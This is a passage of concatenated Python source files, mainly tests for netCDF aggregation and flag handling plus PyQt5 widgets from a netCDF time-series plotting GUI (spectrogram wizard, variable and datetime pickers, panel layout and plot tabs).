# [[0 -- -- -- -- --]
# [1 -- -- -- -- --]
# [2 -- -- -- -- --]
# [-- 3 3 -- -- --]
# [-- 4 4 -- -- --]
# [-- 5 5 -- -- --]
# [-- -- -- 6 6 6]
# [-- -- -- 7 7 7]
# [-- -- -- 8 8 8]]
c = nc_out.variables["c"][:]
self.assertEqual(c.shape, (9, 6))
self.assertEqual(np.sum(c), 90)
self.assertEqual(np.ma.count_masked(c), 36)
def test_collapse_second_dim(self):
config = Config.from_nc(self.inputs[0])
config.dims["b"].update({"flatten": True, "index_by": "b"})
l = generate_aggregation_list(config, self.inputs)
evaluate_aggregation_list(config, l, self.filename)
with nc.Dataset(self.filename) as nc_out: # type: nc.Dataset
# This is the more practically useful method of aggregation,
# where, for example, the dimension "a" might represent time
# and dim "b" is maybe satellite, or event, etc. (something that,
# at any point in time, there could be an arbitrary number of).
# flatten b dimension, should turn out like:
# [[0 -- --]
# [1 -- --]
# [2 -- --]
# [3 3 --]
# [4 4 --]
# [5 5 --]
# [6 6 6]
# [7 7 7]
# [8 8 8]]
c = nc_out.variables["c"][:]
self.assertEqual(c.shape, (9, 3))
self.assertEqual(np.sum(c), 90)
self.assertEqual(np.ma.count_masked(c), 9)
for i, a in enumerate(["a", "b", "c"]):
self.assertEqual(nc_out.variables["b"][i], a)
``` |
{
"source": "5tefan/ncflag",
"score": 3
} |
#### File: ncflag/test/test_misc_api.py
```python
from ncflag import FlagWrap
from unittest import TestCase
import numpy as np
class TestApi(TestCase):
def test_valid_meaning(self):
flags = np.array([0, 0, 1, 2, 3], dtype=np.ubyte)
flag_meanings = "good medium bad extra_bad"
flag_values = np.array([0, 1, 2, 3])
f = FlagWrap(flags, flag_meanings, flag_values)
for flag_meaning in flag_meanings.split():
self.assertTrue(f.is_valid_meaning(flag_meaning))
for not_a_meaning in ["test", "not", "valid", "good1", "extra"]:
self.assertFalse(f.is_valid_meaning(not_a_meaning))
``` |
{
"source": "5tefan/py-netcdf-timeseries-gui",
"score": 2
} |
#### File: analysis/spectrogram/spectrogram.py
```python
from PyQt5.QtWidgets import QWizard, QWidget, QHBoxLayout, QFormLayout, QSpinBox, QComboBox
from matplotlib.backends.backend_qt5 import NavigationToolbar2QT as NavigationToolbar
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.figure import Figure
from pyntpg.analysis.discrete_fourier_transform.discrete_fourier_transform import ChooseParameters
from pyntpg.analysis.preview_result import PreviewResult
from pyntpg.analysis.spectrogram.spectro_window import SpectroWindow
class Spectrogram(QWizard):
def __init__(self):
super(Spectrogram, self).__init__()
self.page1 = ChooseSpectroParameters()
self.page2 = PreviewSpectroResult()
self.addPage(self.page1)
self.addPage(self.page2)
self.button(QWizard.NextButton).clicked.connect(lambda _: self.page2.do_calculation(self.calculate))
def calculate(self):
from scipy.signal import spectrogram
frequency, oslice = self.page1.choose_frequency.get_frequency_and_slice()
args = self.page1.get_arguments_for_spectrogram()
values = self.page1.choose_signal.get_data(oslice)
f, t, Sxx = spectrogram(values, frequency, **args)
return t, f, Sxx
class ChooseSpectroParameters(ChooseParameters):
def __init__(self):
super(ChooseSpectroParameters, self).__init__()
# Add all the other parameters for a spectrogram
options = QWidget()
options_layout = QHBoxLayout()
options.setLayout(options_layout)
self.layout.addWidget(options)
# Add the window type chooser
self.choose_window = SpectroWindow()
options_layout.addWidget(self.choose_window)
# make a new form layout for nperseg and lenstep
secondformcol = QWidget()
secondformcollayout = QFormLayout()
secondformcol.setLayout(secondformcollayout)
# Choose nperseg
self.choose_nperseg = QSpinBox()
self.choose_nperseg.setMinimum(3)
self.choose_nperseg.setMaximum(256) # defult taken from scipy.signal.spectrogram
self.choose_nperseg.setValue(256)
# self.choose_signal.y_picked.connect(lambda n: self.choose_nperseg.setMaximum(n))
secondformcollayout.addRow("nperseg", self.choose_nperseg)
# choose lenstep
self.choose_lenstep = QSpinBox()
self.choose_lenstep.setMinimum(1)
self.choose_lenstep.setMaximum(256)
self.choose_lenstep.setValue(256/8) # default taken from scipy.signal.spectrogram
# self.choose_signal.y_picked.connect(lambda n: self.choose_lenstep.setMaximum(n))
secondformcollayout.addRow("lenstep", self.choose_lenstep)
# coerce choose_signal to emit len b/c we probably missed it
# during this initialization
self.choose_signal.emit_y_picked()
options_layout.addWidget(secondformcol)
# make the third column for the remaining spectrogram params
thirdformcol = QWidget()
thirdformcollayout = QFormLayout()
thirdformcol.setLayout(thirdformcollayout)
# choose detrend
self.choose_detrend = QComboBox()
self.choose_detrend.addItems(["constant", "linear", "none"])
thirdformcollayout.addRow("detrend", self.choose_detrend)
# choose scaling
self.choose_scaling = QComboBox()
self.choose_scaling.addItems(["density", "spectrum"])
thirdformcollayout.addRow("scaling", self.choose_scaling)
options_layout.addWidget(thirdformcol)
def get_arguments_for_spectrogram(self):
"""
Get a dict of arguments for the spectrogram function.
See http://docs.scipy.org/doc/scipy-0.17.0/reference/generated/scipy.signal.spectrogram.html
:rtype: dict
:return: a dictionary of options for scipy.signal.spectrogram
"""
nperseg = self.choose_nperseg.value()
noverlap = nperseg - self.choose_lenstep.value()
window = self.choose_window.get_window()
scaling = str(self.choose_scaling.currentText())
detrend = str(self.choose_detrend.currentText())
return {
"nperseg": nperseg,
"noverlap": noverlap,
"window": window,
"scaling": scaling,
"detrend": detrend
}
class PreviewSpectroResult(PreviewResult):
"""
Subclass PreviewResult to implement make_plot
specific to displaying a Spectrogram in a
pcolormesh.
"""
def __init__(self):
super(PreviewSpectroResult, self).__init__()
def make_plot(self, result):
"""
Display the spectrogram.
:param result: result of Spectrogram.calculate function
:return: None
"""
# create the figure
figure = Figure(tight_layout=True)
ax = figure.add_subplot(1, 1, 1)
ax.pcolormesh(*result, rasterized=True)
canvas = FigureCanvas(figure)
toolbar = NavigationToolbar(canvas, self)
self.result_display_layout.addWidget(canvas)
self.result_display_layout.addWidget(toolbar)
```
#### File: pyntpg/dataset_var_picker/flat_dataset_var_picker.py
```python
from collections import OrderedDict
import numpy as np
from PyQt5.QtCore import QCoreApplication, pyqtSlot, pyqtSignal, QMutex
from PyQt5.QtWidgets import QWidget, QVBoxLayout, QSpinBox, QLabel, QCheckBox
from PyQt5.QtWidgets import QFormLayout
from pyntpg.clear_layout import clear_layout
from pyntpg.dataset_var_picker.dataset_var_picker import DatasetVarPicker, CONSOLE_TEXT
from pyntpg.horizontal_pair import HorizontalPair
from pyntpg.vertical_scroll_area import VerticalScrollArea
class SliceContainer(QWidget):
sig_slicechange = pyqtSignal(list) # list of slices that the user has selected
sig_slices = pyqtSignal(OrderedDict) # list of the dimension slices
def __init__(self, *args, **kwargs):
super(SliceContainer, self).__init__(*args, **kwargs)
self.layout = QFormLayout()
self.layout.setRowWrapPolicy(QFormLayout.WrapAllRows)
self.setLayout(self.layout)
self.layout.setContentsMargins(0, 0, 0, 0)
self.slice_change_mutex = QMutex()
self.spinboxes = OrderedDict()
@pyqtSlot(OrderedDict)
def configure_dimensions(self, dims):
assert isinstance(dims, OrderedDict)
# clear anything that was previously here
clear_layout(self.layout)
self.spinboxes = OrderedDict()
if len(dims) <= 1:
slice_specification = OrderedDict(
[(k, (slice(0, v), False)) for k, v in dims.items()]
)
self.sig_slices.emit(slice_specification)
return
dict_items = dims.items()
for i, (dim, size) in enumerate(dict_items):
# create dim spinboxes and add them to layout
begin_spinbox = QSpinBox()
begin_spinbox.setObjectName("%s:begin" % dim)
begin_spinbox.setRange(0, size-1)
end_spinbox = QSpinBox()
end_spinbox.setObjectName("%s:end" % dim )
end_spinbox.setRange(1, size)
if i == len(dict_items) - 1: # if it's the last dimension take only 1
end_spinbox.setValue(1)
else: # otherwise take them all
end_spinbox.setValue(size)
colon = QLabel(":")
colon.setMaximumWidth(5)
dim_title = QLabel("%s: " % dim)
checkbox_flatten = QCheckBox("Flatten?", self)
checkbox_flatten.setChecked(False) # start checked, back compatible behavior
# Can't flatten the first dimension, so setting first one not enabled.
# keeping the box though to keep the layout consistent.
checkbox_flatten.setEnabled(i > 0)
row = HorizontalPair(begin_spinbox, colon, end_spinbox, checkbox_flatten)
checkbox_flatten.stateChanged.connect(self.slice_changed)
self.layout.addRow(dim_title, row)
begin_spinbox.valueChanged.connect(self.slice_changed)
end_spinbox.valueChanged.connect(self.slice_changed)
self.spinboxes[dim] = [begin_spinbox, end_spinbox, checkbox_flatten]
self.emit_slices()
@pyqtSlot(int)
def slice_changed(self, x):
# mutex protected otherwise this slot will potentially fire multiple times
# responding to programmatic changing of the spin boxes.
if self.slice_change_mutex.tryLock():
spinbox = self.sender()
name = spinbox.objectName()
if "begin" in name:
# end must be at least start + 1
# if begin changed, make sure end is being+1 or greater
try:
dim = name.split(":")[0]
end_spinbox = self.spinboxes[dim][1]
if end_spinbox.value() <= x:
end_spinbox.setValue(x+1)
except KeyError:
pass
elif "end" in name:
# end must be at least start + 1
# if end changed, make sure begin is less than end
try:
dim = name.split(":")[0]
begin_spinbox = self.spinboxes[dim][0]
if begin_spinbox.value() >= x:
begin_spinbox.setValue(x-1)
except KeyError:
pass
self.emit_slices()
self.slice_change_mutex.unlock()
def emit_slices(self):
slice_specification = OrderedDict()
for dim, (begin, end, flatten) in self.spinboxes.items():
flatten_condition = flatten is not None and flatten.isChecked()
slice_specification[dim] = (slice(begin.value(), end.value()), flatten_condition)
self.sig_slices.emit(slice_specification)
# TODO: combine these two classes
class DimensionFlattenPicker(QWidget):
sig_slices = pyqtSignal(OrderedDict) # list of the dimension slices, pass through from SliceContainer
def __init__(self, *args, **kwargs):
super(DimensionFlattenPicker, self).__init__(*args, **kwargs)
self.layout = QVBoxLayout()
self.setLayout(self.layout)
self.layout.setContentsMargins(0, 0, 0, 0)
self.datasets = QCoreApplication.instance().datasets
self.ipython = QCoreApplication.instance().ipython
self.slice_container = SliceContainer()
self.slice_container.setMinimumHeight(self.slice_container.minimumSizeHint().height())
self.layout.addWidget(VerticalScrollArea(self.slice_container))
self.slice_container.sig_slices.connect(self.accept_slice_selection)
self.slices = OrderedDict()
self.shape = ()
@pyqtSlot(str, str)
def variable_changed(self, dataset, variable):
if dataset == CONSOLE_TEXT:
shape = np.shape(self.ipython.get_var_value(variable))
names = np.arange(len(shape))
else:
shape = np.shape(self.datasets.datasets[dataset].variables[variable])
names = self.datasets.datasets[dataset].variables[variable].dimensions
self.shape = shape
enable_slicing = len(shape) > 1
self.slice_container.setEnabled(enable_slicing)
self.slice_container.configure_dimensions(OrderedDict(zip(names, shape)))
@pyqtSlot(OrderedDict)
def accept_slice_selection(self, slices=OrderedDict()):
self.slices = slices
self.sig_slices.emit(slices)
class FlatDatasetVarPicker(DatasetVarPicker):
sig_anticipated_length = pyqtSignal(int) # anticipated size along x dimension
sig_slices = pyqtSignal(OrderedDict) # list of the dimension slices, pass through from SliceContainer
signal_status_message = pyqtSignal(str)
def __init__(self, *args, **kwargs):
super(FlatDatasetVarPicker, self).__init__(*args, **kwargs)
# inheriting self.layout instance of QVboxLayout
self.layout.setContentsMargins(0, 0, 0, 0)
self.flattener = DimensionFlattenPicker()
self.layout.addWidget(self.flattener)
self.slices = OrderedDict() # hold the slices user selects, use in get_data.
self.anticipated_length = None
self.flattener.sig_slices.connect(self.accept_slice_selection)
self.flattener.sig_slices.connect(self.sig_slices)
self.variable_widget.currentIndexChanged[str].connect(self.check_dims)
@pyqtSlot(str)
def check_dims(self, variable):
dataset = self.dataset_widget.currentText()
if dataset and variable:
self.flattener.variable_changed(dataset, variable)
@pyqtSlot(OrderedDict)
def accept_slice_selection(self, slices=OrderedDict()):
self.slices = slices
reshaping = self.get_reshape(self.slices)
# reshaping should be either length 1 or 2 because the output needs to be 1D or 2D for matplotlib.
# If 1D, the length is obviously just the length. If 2D however, assume that the first dimension is
# the length (x-axis) and the second dimension will be multiple sets of y values along that axis.
# So, in order to facilitate the user matching the x axis up with the times on the x-axis selector,
# use the first dimension as anticipated length.
self.anticipated_length = reshaping[0]
self.sig_anticipated_length.emit(self.anticipated_length)
@staticmethod
def get_reshape(slice_specification):
"""
A slice_specification is an OrderedDict that the user fills out by specifying slice and flattening selections
for each dimension of the the data selected.
In order to actually convert the data from original multidim format into the flattened selection,
we will need to call numpy reshape with arguments.... this function determines those arguments.
:param slice_specification: OrderedDict[slice, bool]
:return: list[int]
"""
reshaping = []
for i, (the_slice, flatten_condition) in enumerate(slice_specification.values()):
dim_len = the_slice.stop - the_slice.start
if i == 0:
# the first dimension has to just be taken, since there's nothing behind to flatten against.
reshaping.append(dim_len)
elif flatten_condition or dim_len == 1:
# otherwise flatten.
# things are either explicitly marked to flatten, or if only size 1
# are flattened.
reshaping[-1] = reshaping[-1] * dim_len
else:
reshaping.append(dim_len)
return reshaping
def get_data(self, _=None):
dataset, variable = self.selected()
oslices = [v[0] for v in self.slices.values()]
data = QCoreApplication.instance().get_data(dataset, variable, oslice=oslices)
reshaping = self.get_reshape(self.slices)
assert len(reshaping) <= len(data.shape), "Reshaping must have fewer dims than data, " \
"but found rehape {} vs {}".format(reshaping, data.shape)
return data.reshape(tuple(reshaping))
def get_config(self):
default = super(FlatDatasetVarPicker, self).get_config()
# to the defualt, add labels for each of the dimensions
# in the plot, we want to have labels like "var(dim1=0, dim2=1)" as an example,
# where, if it's a 2D plot, dim2 would range from y to z depending on what
# is selected here in the slice_specification (self.slices).
dim_labels = {}
# ... TODO
return default
```
#### File: dataset_var_picker/x_picker/datetime_picker.py
```python
from collections import OrderedDict
from datetime import datetime, timedelta
import netCDF4 as nc
import numpy as np
from PyQt5.QtCore import pyqtSignal, pyqtSlot, QMutex
from PyQt5.QtWidgets import QWidget, QDateTimeEdit, QFormLayout
try:
# for netCDF4 versions before 1.4.0
from netCDF4._netCDF4 import _dateparse
except ImportError:
# netcdf4 version 1.4.0 removes netcdftime to a separate package "cftime"
from cftime._cftime import _dateparse
from pyntpg.dataset_var_picker.dataset_var_picker import CONSOLE_TEXT
from pyntpg.dataset_var_picker.dataset_var_picker import DatasetVarPicker
try:
from cftime import DatetimeGregorian
datetime_types = (datetime, DatetimeGregorian)
except ImportError:
# fallback compat if cftime < 1.2.0 installed.
datetime_types = (datetime,)
def datetime_units(units):
""" Detect if the str units is a parsable datetime units format. """
try:
try:
_dateparse(units)
return True
except TypeError:
# CASE: cftime > 1.2.0, signature chagned,
# needs to be called with calendard "standard" arg.
# unfortunately inspect.getfullargspec doesn't work
# on builtin functions (which _dateparse is b/c it's
# in C. So, can't do this more elegantly by inspection.
_dateparse(units, "standard")
return True
except (AttributeError, ValueError):
return False
class DatetimePicker(DatasetVarPicker):
signal_status_message = pyqtSignal(str)
def __init__(self, *args, **kwargs):
self.slices = OrderedDict()
self.target_len = None
super(DatetimePicker, self).__init__(*args, **kwargs)
self.date_range_container = QWidget()
self.date_range_layout = QFormLayout()
self.date_range_container.setLayout(self.date_range_layout)
self.layout.addWidget(self.date_range_container)
# create the date slice widgets
self.start_time = QDateTimeEdit()
self.start_time.setDisplayFormat("yyyy-MM-dd hh:mm:ss")
self.date_range_layout.addRow("start", self.start_time)
self.end_time = QDateTimeEdit()
self.end_time.setDisplayFormat("yyyy-MM-dd hh:mm:ss")
self.date_range_layout.addRow("end", self.end_time)
# a mutex to prevent programatic changes from being registered as user inputs
self.datetime_change_mutex = QMutex()
self.datetime_user_modified = False
self.start_time.dateTimeChanged.connect(self.accept_datetime_change)
self.end_time.dateTimeChanged.connect(self.accept_datetime_change)
self.variable_widget.currentIndexChanged[str].connect(self.variable_selected)
@pyqtSlot()
def accept_datetime_change(self):
if self.datetime_change_mutex.tryLock(): # MAKE SURE TO UNLOCK
self.datetime_user_modified = True
self.datetime_change_mutex.unlock() # MADE SURE TO UNLCOK
@pyqtSlot(int)
def accept_target_len(self, val):
self.target_len = val
@pyqtSlot(OrderedDict)
def accept_slices(self, slices):
self.slices = slices
self.dataset_selected(self.dataset_widget.currentText())
@pyqtSlot(str)
def variable_selected(self, variable):
""" Once variable selected, must set the min and max datetimes. """
dataset = self.dataset_widget.currentText()
if not dataset or not variable:
return # don't follow through for changed to nothing
num_dims = len(self.get_original_shape(dataset, variable))
# This is going to get funky....
# 1. Assume that the start and end are the min and max values.... in other words, assume
# that the time array is in order and sorted.
bounds = super(DatetimePicker, self).get_data(oslice=[[0, -1] for _ in range(num_dims)])
# 2. If either of the bound are masked, take the hit and read the whole thing and calculate min max.
if np.ma.count_masked(bounds) > 0:
full_data = super(DatetimePicker, self).get_data()
bounds = np.array([np.nanmin(full_data), np.nanmax(full_data)])
if not isinstance(bounds.item(0), datetime_types):
value = self.get_value()
# must have units if not already datetime because of show_var condition
bounds = nc.num2date(bounds, value.units)
# super annoying... cftime 1.2.0 returns a custom type that does not
# inherit from datetime, so it bascially can't be passed to ANYTHING
# that expects plain old datetimes anymore.... so, roundabout conversion
# to ensure we have a datetime object. This will work for pre cftime 1.2.0
# returning native datetime since dattetime has isoformat method as well.
start = datetime.fromisoformat(bounds.item(0).isoformat())
end = datetime.fromisoformat(bounds.item(-1).isoformat())
if start is None or end is None:
self.signal_status_message.emit(
"Error: fill in time array bound for dataset {}, var {}. Cannot use.".format(dataset, variable)
)
return # also abort here... don't follow through
# must grab the original values before setting the range because setting the
# range will set the value to start or range if it's outside of range when changed.
original_start_dt = self.start_time.dateTime().toPyDateTime()
original_end_dt = self.end_time.dateTime().toPyDateTime()
self.datetime_change_mutex.lock() # A LOCK!!!! ENSURE UNLOCK.
self.start_time.setDateTimeRange(start, end)
self.end_time.setDateTimeRange(start, end)
# smc@20181217 keep original user modified dates if they are valid.
# emphasis on user modified! That's why new listeners required.
# only set the times to the bounds if the original datetimes were not in the range.
if original_start_dt < start or original_end_dt > end or not self.datetime_user_modified :
self.start_time.setDateTime(start)
if original_end_dt > end or original_end_dt < start or not self.datetime_user_modified:
self.end_time.setDateTime(end)
self.datetime_change_mutex.unlock()
def show_var_condition(self, dataset, variable):
if not super(DatetimePicker, self).show_var_condition(dataset, variable):
return False
dimensions = self.get_dimensions(dataset, variable)
if not set(list(dimensions.keys())).issubset(list(self.slices.keys())):
return False
if not np.prod(list(dimensions.values())) == self.target_len:
return False
value = self.get_value(dataset, variable)
if dataset == CONSOLE_TEXT:
return ((hasattr(value, "units") and datetime_units(value.units))
or isinstance(np.array(value).item(0), datetime_types))
else:
# separate these out so don't try to read from the netcdf here.
return hasattr(value, "units") and datetime_units(value.units)
def get_data(self, _=None):
num_dims = len(self.get_original_shape())
oslices = [v[0] for v in self.slices.values()]
data = super(DatetimePicker, self).get_data(oslice=oslices[:num_dims])
mask = np.ma.getmaskarray(data) # hopefully none!
if not isinstance(data.item(0), datetime_types):
# not datetime already, convert through num2date
# by assumption value has a units attribute since
# show_var_condition, would not allow the variable to be displayed
# unless it was already a datetime or had num2date parseable units field
value = self.get_value()
data = nc.num2date(data, value.units)
if len(self.slices) > 1:
data = data.flatten()
mask = mask.flatten()
start_bound_dt = self.start_time.dateTime().toPyDateTime()
end_bound_dt = self.end_time.dateTime().toPyDateTime()
if np.any(mask):
# if any data values are masked, must go through and remove the Nones from the data array...
# the None values are introduced by the nc.num2date call on masked elements
mask_date_detector = np.vectorize(lambda x: x is None or x < start_bound_dt or x > end_bound_dt)
return np.ma.masked_where(mask_date_detector(data), data)
else:
# otherwise, this approach seems to be much more efficient.
return np.ma.masked_where((data < start_bound_dt) | (data > end_bound_dt), data)
def get_config(self):
default = super(DatetimePicker, self).get_config()
default.update({"type": "datetime"})
return default
```
#### File: dataset_var_picker/x_picker/x_picker.py
```python
from collections import OrderedDict
from PyQt5.QtCore import pyqtSignal
from PyQt5.QtWidgets import QLabel, QStackedWidget
from PyQt5.QtWidgets import QVBoxLayout
from PyQt5.QtWidgets import QWidget, QComboBox
from pyntpg.dataset_var_picker.x_picker.datetime_picker import DatetimePicker
from pyntpg.dataset_var_picker.x_picker.index_picker import IndexPicker
from pyntpg.dataset_var_picker.x_picker.scatter_picker import ScatterPicker
from pyntpg.horizontal_pair import HorizontalFormPair
class XPicker(QWidget):
""" This is a custom implementation of a dataset and var picker
intended for the panel configurer to pick the x axis after the
y axis has been selected.
Support three different types of axes to be chosen,
index, datetime, and scatter.
index plots the data selected for the y axis vs index in array.
datetime plots y axis data vs datetime selected for a datetime variable.
scatter allows the x axis to be an arbitrary variable of the same length.
"""
"""
Upper half: choose axis type: combobox.
Bottom half: specific details according to axis type chosen above.
"""
sig_target_length = pyqtSignal(int)
sig_slices = pyqtSignal(OrderedDict)
signal_status_message = pyqtSignal(str)
def __init__(self, *args, **kwargs):
title = kwargs.pop("title", "x-axis")
super(XPicker, self).__init__(*args, **kwargs)
self.layout = QVBoxLayout()
self.layout.setContentsMargins(0, 0, 5, 0)
self.setLayout(self.layout)
if title is not None:
self.layout.addWidget(QLabel(title))
self.types = OrderedDict([
("index", IndexPicker),
("datetime", DatetimePicker),
("scatter", ScatterPicker)
])
# create the toggle widget between axes types
self.toggle_type = QComboBox()
self.toggle_type.setMaximumWidth(200)
self.toggle_type.addItems(self.types.keys())
# self.toggle_type.activated.connect(self.type_dispatcher)
self.layout.addWidget(HorizontalFormPair("type", self.toggle_type))
self.widget_stack = QStackedWidget()
for each in self.types.values():
instance = each()
if hasattr(instance, "accept_target_len"):
self.sig_target_length.connect(instance.accept_target_len)
if hasattr(instance, "accept_slices"):
self.sig_slices.connect(instance.accept_slices)
if hasattr(instance, "signal_status_message"):
# if the component has a signal_status_message attribute, hook it to
# self so that it can be propagated up to the plot tab and displayed.
self.signal_status_message.connect(instance.signal_status_message)
self.widget_stack.addWidget(instance)
self.layout.addWidget(self.widget_stack)
# set the widget on top of the stack based on what's selected in the combobox
self.toggle_type.activated[int].connect(self.widget_stack.setCurrentIndex)
def get_config(self):
widget = self.widget_stack.currentWidget()
return widget.get_config() # delegate delegate delegate
#
# def get_config(self):
# """ Calling self.get_config will collect all the options
# configured through the UI into a dict for plotting.
# :return: dict configuration object specifying x-axis
# """
# dataset = str(self.dataset_widget.currentText())
# variable = str(self.variable_widget.currentText())
# axis_type = self.get_type()
# result = {
# "type": axis_type,
# "xdataset": dataset,
# "xvariable": variable,
# "xdata": self.get_data()
# }
# ncvar = self.get_ncvar()
# if hasattr(ncvar, "units") and axis_type != "datetime":
# result.update({"xunits": ncvar.units})
# return result
#
# if __name__ == "__main__":
# import sys
# from PyQt5.QtWidgets import QApplication
# app = QApplication(sys.argv)
# main = XPicker()
# main.show()
# exit(app.exec_())
```
#### File: pyntpg/plot_tabs/layout_picker.py
```python
from __future__ import print_function
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import QFrame, QHBoxLayout
from PyQt5.QtWidgets import QWidget, QVBoxLayout, QLabel, QSplitter, QSpinBox, QDialogButtonBox, QFormLayout, QDialog
# TODO: for the output function, make it so that all panels are an increment of 1/n where n is the number of panels
DEFAULT_LAYOUT = (1, 2) # number cols, number rows
class LayoutPicker(QWidget):
""" The LayoutPicker class creates a widget of numbered rectangles
formed by movable sliders from which a user can very flexibly, but
visually choose how subplots in their graph should look and be laid out.
The implementation creates horizontal sliders first and populates each
with vertical sliders. The effect of this is that rows are cohesive but
each row has independent columns. I chose rows because time series are
generally horizontal. A column first implementation would be easy to adapt.
"""
def __init__(self):
""" Initialize the widget with layout, give label, and create
the sliders.
:return: None
"""
QWidget.__init__(self)
self.layout = QVBoxLayout()
self.setLayout(self.layout)
title = QLabel("Panel Layout")
self.layout.addWidget(title)
self.visible_widgets = []
self.widgets = []
self.vcount = 0 # number of rows
self.hcount = 0 # number of cols
self.vsplitter = None
self.make_splitters(*DEFAULT_LAYOUT)
def make_splitters(self, height, width):
# some variables we are going to need to keep track of everything
self.visible_widgets = []
self.widgets = []
self.vcount = width # number of rows
self.hcount = height # number of cols
try:
self.vsplitter.deleteLater()
except AttributeError:
pass
self.vsplitter = QSplitter(Qt.Vertical)
self.vsplitter.setHandleWidth(2)
self.vsplitter.setStyleSheet("QSplitter::handle {border: 1px solid white; background: black; }")
for i in range(self.vcount):
hsplitter = QSplitter(Qt.Horizontal)
hsplitter.setHandleWidth(2)
for j in range(self.hcount):
widget = QFrame()
self.widgets.append(widget)
self.visible_widgets.append(widget)
widget.setFrameShape(QFrame.StyledPanel)
widget.setLayout(QHBoxLayout())
# initialize the label. Label text will be changed through indirect references
widget.layout().addWidget(QLabel("%s" % self.visible_widgets.index(widget)))
hsplitter.addWidget(widget)
self.vsplitter.addWidget(hsplitter)
# connect splitterMoved after widgets added so things dont fire during setup
hsplitter.splitterMoved.connect(self.recalculate_visible_horizontal)
self.vsplitter.splitterMoved.connect(self.recalculate_visible_vertical)
self.layout.addWidget(self.vsplitter)
def recalculate_visible_horizontal(self):
""" When a horizontal Slider is moved, see if it closed or opened
any boxes and change self.widgets_visible and update numbering.
This function essentially updates the contents of self.visible_widgets.
:return: None
"""
for i, vwidth in enumerate(self.vsplitter.sizes()):
if vwidth > 0: # ignore hidden rows
for j, hwidth in enumerate(self.vsplitter.widget(i).sizes()):
widget = self.widgets[(i * self.vcount) + j]
if hwidth == 0 and widget in self.visible_widgets:
self.visible_widgets.remove(widget)
elif hwidth != 0 and widget not in self.visible_widgets:
self.visible_widgets.append(widget)
self.label_frames()
def recalculate_visible_vertical(self):
""" When a vertical slider is moved see if it closed or opened any
rows and change the self.widgets_available and update the numbering.
This function essentially updates the contents of self.visible_widgets.
:return: None
"""
for i, vwidth in enumerate(self.vsplitter.sizes()):
if vwidth == 0:
# if the row is hidden, take the widget out of visible_widgets
for j in range(self.hcount):
widget = self.widgets[(i * self.hcount) + j]
if widget in self.visible_widgets:
self.visible_widgets.remove(widget)
else:
# otherwise, it might have been hidden and shown now so put
# it back in visibile_widgets, except if it has zero width
for j, hwidth in enumerate(self.vsplitter.widget(i).sizes()):
widget = self.widgets[(i * self.hcount) + j]
if hwidth > 0 and widget not in self.visible_widgets:
self.visible_widgets.append(widget)
self.label_frames()
def label_frames(self):
""" Put the frame numbering on each of the panels using their position in
self.visible_widgets and the ordering from self.widgets.
This function creates the numbering.
:return: None
"""
# A little bit clever here, instead of trying to always insert the widgets
# back into the visible_widgets in the correct order, we just sort them
# according to where they are in self.widgets which should be invariant
self.visible_widgets.sort(key=lambda x: self.widgets.index(x))
for i, widget in enumerate(self.visible_widgets):
widget.layout().itemAt(0).widget().setText("%s" % i)
def create_gridspec(self):
""" The plot that gets created will be configured with gridspec. In this
method, we create the height_ratios and width_ratios that will be used.
Note: height_ratios is an array, while width_ratios is an array of arrays,
each array corresponding to the panels in a height row.
:return: dict of height_ratios and width_ratios to use in mpl gridspec
"""
# TODO: snap features, close to 1/2 and 1/3 snap. Also within tolerance of other panels snap together
height_ratios = []
width_ratios = []
for i, vwidth in enumerate(self.vsplitter.sizes()):
if vwidth > 0:
height_ratios.append(vwidth)
width_ratio = []
for j, hwidth in enumerate(self.vsplitter.widget(i).sizes()):
if hwidth > 0:
width_ratio.append(hwidth)
width_ratios.append(width_ratio)
return {"height_ratios": height_ratios, "width_ratios": width_ratios}
class DimesnionChangeDialog(QDialog):
def __init__(self):
super(DimesnionChangeDialog, self).__init__()
self.layout = QFormLayout()
self.setLayout(self.layout)
# add the height width inputs
self.height = QSpinBox()
self.height.setMinimum(1)
self.layout.addRow("number ools", self.height)
self.width = QSpinBox()
self.width.setMinimum(1)
self.layout.addRow("number rows", self.width)
# add the cancel/Ok at bottom
buttonbox = QDialogButtonBox(QDialogButtonBox.Ok | QDialogButtonBox.Cancel,
Qt.Horizontal, self)
self.layout.addRow(buttonbox)
buttonbox.accepted.connect(self.accept)
buttonbox.rejected.connect(self.reject)
def get(self):
if self.exec_() == QDialog.Accepted:
return self.height.value(), self.width.value()
# For testing individual widget
if __name__ == "__main__":
import sys
from PyQt5.QtWidgets import QApplication
app = QApplication(sys.argv)
main = LayoutPicker()
main.show()
exit(app.exec_())
```
#### File: pyntpg/plot_tabs/main_widget.py
```python
from PyQt5.QtCore import QMutex
from PyQt5.QtWidgets import QTabWidget, QWidget, QTabBar, QLineEdit
from pyntpg.plot_tabs.plot_tab import PlotTab
from pyntpg.vertical_scroll_area import VerticalScrollArea
class PlotTabs(QTabWidget):
def __init__(self):
super(PlotTabs, self).__init__()
self.mutex = QMutex()
self.setTabBar(PlotTabBar())
scrollarea = VerticalScrollArea()
scrollarea.setWidget(PlotTab())
self.addTab(scrollarea, "plot")
# Add the "+" tab and make sure it has no close button
plus_tab = QWidget()
self.addTab(plus_tab, "+")
index = self.indexOf(plus_tab)
self.tabBar().setTabButton(index, QTabBar.RightSide, None)
self.currentChanged.connect(self.tab_changed)
self.tabCloseRequested.connect(self.close_tab)
def tab_changed(self, index):
maxindex = self.count() - 1
if ((index == maxindex or index == -1) and
self.mutex.tryLock()):
scrollarea = VerticalScrollArea()
scrollarea.setWidget(PlotTab())
self.insertTab(maxindex, scrollarea, "plot")
self.setCurrentIndex(maxindex)
self.mutex.unlock()
def close_tab(self, index):
if index == self.count() - 2:
self.setCurrentIndex(index - 1)
self.widget(index).deleteLater()
self.removeTab(index)
class PlotTabBar(QTabBar):
# credits of http://stackoverflow.com/a/30269356
def __init__(self):
super(PlotTabBar, self).__init__()
# Mutex to keep from editing another tab
# while one is already being edited
self.mutex = QMutex()
self.setTabsClosable(True)
def mouseDoubleClickEvent(self, event=None):
if event is not None:
tab_index = self.tabAt(event.pos())
else:
tab_index = self.currentIndex()
if self.mutex.tryLock() and tab_index != self.count() - 1:
self.start_rename(tab_index)
def start_rename(self, tab_index):
self.__edited_tab = tab_index
rect = self.tabRect(tab_index)
top_margin = 3
left_margin = 6
self.__edit = QLineEdit(self)
self.__edit.show()
self.__edit.move(rect.left() + left_margin, rect.top() + top_margin)
self.__edit.resize(rect.width() - 2 * left_margin, rect.height() - 2 * top_margin)
self.__edit.setText(self.tabText(tab_index))
